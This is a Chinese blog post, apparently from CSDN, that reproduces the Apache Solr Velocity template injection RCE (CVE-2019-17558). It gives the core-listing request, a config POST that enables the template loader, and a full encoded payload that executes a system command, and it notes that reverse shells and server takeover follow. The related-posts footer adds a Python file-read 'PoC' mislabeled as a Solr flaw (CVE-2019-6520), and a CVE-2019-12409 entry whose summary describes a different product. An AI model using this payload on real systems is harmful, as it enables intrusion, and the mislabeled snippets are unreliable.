Apache Solr Velocity注入远程命令执行(CVE-2019-17558)

于 2024-02-27 11:30:59 发布
阅读量301 收藏 2
点赞数 6
文章标签: apache solr lucene
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65150886/article/details/136318026
版权

漏洞描述:

Solr是Apache Lucene项目的开源企业搜索平台。 其主要功能包括全文检索、命中标示、分面搜索、动态聚类、数据库集成,以及富文本的处理。

2019年10月30日,国外安全研究人员放出了一个关于solr模板注入的exp,攻击者通过未授权访问solr服务器,发送特定的数据包开启params.resource.loader.enabled,然后通过get请求访问接口导致服务器命令执行。

该漏洞存在于5.0.0 到 8.3.1版本中。

复现过程:

1.访问http://ip:port,出现如下页面,开始实验

2.默认情况下params.resource.loader.enabled配置未打开,无法使用自定义模板。我们先通过如下API获取所有的核心

http://ip:port/solr/admin/cores?indexInfo=false&wt=json

3.通过如下请求开启params.resource.loader.enabled,其中API路径包含刚才获取的core名称

POST /solr/demo/config HTTP/1.1

{

  "update-queryresponsewriter": {

    "startup": "lazy",

    "name": "velocity",

    "class": "solr.VelocityResponseWriter",

    "template.base.dir": "",

    "solr.resource.loader.enabled": "true",

    "params.resource.loader.enabled": "true"

  }

}

4.执行id命令

http://ip:port/solr/demo/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end

借此漏洞,攻击者可以继承Web服务程序的权限去执行系统命令(任意代码)或读写文件;反弹shell;控制整个网站甚至控制服务器进一步内网渗透。

修复建议:

  1. 升级版本。

慕筱蚺
关注
  • 6
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
solr_exploit:Apache Solr远程代码执行突破(CVE-2019-0193)漏洞利用
03-10
声明 此处提供的漏洞检测方法,文件等内容,均仅限于安全从业者在获得法律授权的情况下使用,目的是检测已授权的服务器的安全性。...文档中只有一个item元素骑士实现只执行1次命令 也可以自己启动网络服务器托
Apache Solr Velocity 注入远程命令执行漏洞 (CVE-2019-17558)
weixin_44047654的博客
02-20 965
Apache Solr Velocity 注入远程命令执行漏洞 (CVE-2019-17558)
Apache Solr Velocity模板注入RCE
众生度尽,方证菩提
05-02 1166
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
漏洞复现----4、Apache Solrvelocity远程命令执行(CVE-2019-17558)
七天
11-26 1543
文章目录一、Apache Solr 简介二、CVE-2019-17558简介三、漏洞复现 一、Apache Solr 简介 Solr是基于Lucene的面向企业搜索的web应用,是一个独立的企业级搜索应用服务器。它对外提供类似于Web-service的API接口。 用户可以通过HTTP请求,向搜索引擎服务器提交一定格式的XML文件,生成索引; 也可以通过HTTP GET操作提出查找请求,并得到Xml/json格式的返回结果。 Apache Solr下载安装 二、CVE-2019-17558简介 在Ap
Apache Solr Velocity模板远程代码执行漏洞复现
weixin_44253823的博客
10-31 549
下载漏洞环境https://mirrors.tuna.tsinghua.edu.cn/apache/lucene/solr/8.2.0/solr-8.2.0.zip 解压以后,进入solr-8.1.0/bin目录 使用./solr -e dih -force开启漏洞环境 访问http://youip:8983/solr/#/进入主界面 点击左侧的Core Selector查看集合名称,可以...
【漏洞复现】Apache Solr Velocity 注入远程命令执行漏洞(CVE-2019-17558
Pluto.的博客
12-27 809
文章目录Vulhub漏洞复现Apache Solr Velocity 注入远程命令执行漏洞复现一、漏洞概述二、漏洞复现1. 复现步骤 Vulhub漏洞复现 Apache Solr Velocity 注入远程命令执行漏洞复现 一、漏洞概述 Apache Solr 在其 5.0.0 到 8.3.1版本中,用户可以注入自定义模板,通过Velocity模板语言执行任意命令。 二、漏洞复现 1. 复现步骤 使用vulhub中CVE-2019-17558的环境进行搭建 https://vulhub.org/#/en
CVE-2019-0193 Apache-Solr via Velocity template RCE.MD
04-12
CVE-2019-0193 Apache-Solr via Velocity template RCE
Apache Tomcat CVE-2019-0232 远程代码执行漏洞 - tdcoming'blog QQ group 90
08-04
背景:近日,ApacheSolr官方团队在最新的安全更新中披露了一则ApacheSolrDeserialization远程代…阅读数 1386557篇文章排名:
CVE-2020-13957 Apache Solr 未授权上传.md
04-13
CVE-2020-13957 Apache Solr 未授权上传
【漏洞预警】Apache Solr由于错误默认配置导致的RCE(CVE-2019-12409)
NOSEC2019的博客
11-19 872
近日,白帽汇安全研究院发现网络上出现针对Apache Solr服务器的远程代码执行漏洞。 该漏洞是在受影响的版本中,默认情况下配置文件solr.in.sh的配置选项ENABLE_REMOTE_JMX_OPTS字段值是“true”,这会启用JMX监视服务并会在公网中监听一个18983的RMI端口,没有任何认证。也就是说在无需身份验证情况下,攻击者结合使用JMX RMI就会造成远程代码攻击。 概况...
(环境搭建+复现)CVE-2019-12409 Apache Solr远程代码执行漏洞
daxi0ng的博客
03-16 2506
CVE编号】 CVE-2019-12409 【漏洞名称】 Apache Solr远程代码执行漏洞 1【靶标分类】 web中间件漏洞 2【漏洞分类】 命令执行 3【漏洞等级】 高 4【漏洞简介】 Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/sh这样的shell文件...
【漏洞预警】Apache Solr基于Velocity模板的远程命令执行漏洞
NOSEC2019的博客
10-31 972
2019年10月末,白帽汇安全研究院发现网络上出现针对Apache Solr服务器的远程代码执行漏洞。该漏洞是由于Velocity模板存在注入所致(Velocity是一个基于Java的模板引擎,可让使用者通过模板语言引用Java中定义的对象)。攻击者在知道Solr服务器上Core名称后,先把params.resource.loader.enabled设置为true(就可加载指定资源),再进行远程...
Apache Solr Velocity模板注入远程命令执行漏洞
合天网安学院
11-01 481
0x00 前言今天在群里看到有人说GitHub上公布了一个关于solr的RCE漏洞,于是立马复现了一波!确定该poc是真实有效的。Solr是一个独立的企业级搜索应用服务器,它对外提供类似...
solr专题之四】关于VelocityResponseWriter
apple01010105的博客
07-22 156
一、关于Velocity的基本配置 在Solr中,可以以多种方式返回搜索结果,如单纯的文本回复(XML、JSON、CSV等),也可以返回velocity,js等格式。而VelocityResponseWriter就是用于将返回velocity类型文本,以便直接用于结果呈现。 在Solr提供的example,其中的一个RequestHandler--/...
Apache Solr Velocity[漏洞复现]
YUAN
10-31 551
Apache Solr Velocity模板远程代码执行 CVE编号 暂无 漏洞威胁等级 高危 影响范围 包括但不限于8.2.0(最新版本) 漏洞复现 环境准备 下载最新的Solr 链接https://mirrors.tuna.tsinghua.edu.cn/apache/lucene/solr/8.2.0/solr-8.2.0.zip 解压以后,进入solr-8.1.0/bin目录 使用./so...
cve-2019-6520编写poc
最新发布
05-25
CVE-2019-6520是一个Apache Solr中的任意文件读取漏洞。攻击者可以利用该漏洞读取服务器上的任意文件。 下面是一个简单的Python脚本,可以利用该漏洞读取指定文件: ```python import requests url = "http://<target>/solr/+/get" params = { "getParams": { "content": "file:/<path to file>" } } response = requests.get(url, params=params) print(response.text) ``` 将`<target>`替换为目标服务器的IP地址或域名,将`<path to file>`替换为要读取的文件的路径。 例如,要读取`/etc/passwd`文件,可以使用以下命令: ```python import requests url = "http://example.com/solr/+/get" params = { "getParams": { "content": "file:/etc/passwd" } } response = requests.get(url, params=params) print(response.text) ``` 请注意,此脚本仅用于学习和研究目的,不应用于未经授权的攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值